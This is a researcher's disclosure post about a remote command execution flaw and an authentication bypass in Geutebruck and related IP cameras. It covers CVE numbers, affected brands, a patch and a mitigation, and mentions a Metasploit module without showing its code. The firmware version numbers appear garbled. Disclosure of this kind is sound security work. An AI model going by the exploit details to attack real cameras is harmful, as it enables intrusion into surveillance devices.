Last summer during a pentest for a client we came across high-end IP cameras made by Geutebruck, a “leading German manufacturer and developer of high-quality, intelligent video security solutions” (source: [http://www.sourcesecurity.com/companies/enhanced-company-listing/geutebruck-gmbh.html] (http://www.sourcesecurity.com/companies/enhanced-company-listing/geutebruck-gmbh.html)) and found a trivial remote command execution vulnerability (0day) affecting version 22.214.171.124 and prior versions. We’ve choose to “responsible disclose” it, directly to Geutebruck and the ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). Probably the best option as the Mirai botnet was actively exploiting IP cams at that time. Since then a new firmware has been released (126.96.36.199) to patch that, ICS-CERT has released an advisory and a CVE (CVE-2017-5173) has been assigned.
Many thanks to Geutebruck and ICS-CERT teams and of course Dan Goodin (who helped on the communication with Geutebruck) and Frédéric Cikala and Florent Montel for discovering CVE-2017-5174 (authentication bypass) which helped a lot ;)
“Successful exploitation of these vulnerabilities could allow the attacker to bypass authentication and obtain remote anonymous access to the device; these vulnerabilities may allow remote code execution. (…)".
We’ve coded a metasploit exploit:
Ps command to see the running processes after the camera was owned (you can see abused cgi at the pid 3055 and the abused system call and metasploit payload at the pid 3056):
Geutebruck has released a new software version, Version 188.8.131.52, to address the identified vulnerability, which is available at the following location (registration needed): http://www.geutebrueck.com/en_EN/login.html
If an update is not possible right now in between users can disable the “Enable anonymous access” option to mitigate the risk. The RCE will remain but will only be reachable by authenticated users.
In the wild
Many brands use the same firmware (and are vulnerable too):
- UDP Technology (which is also the supplier of the firmware for the other vendors)
- THRIVE Intelligence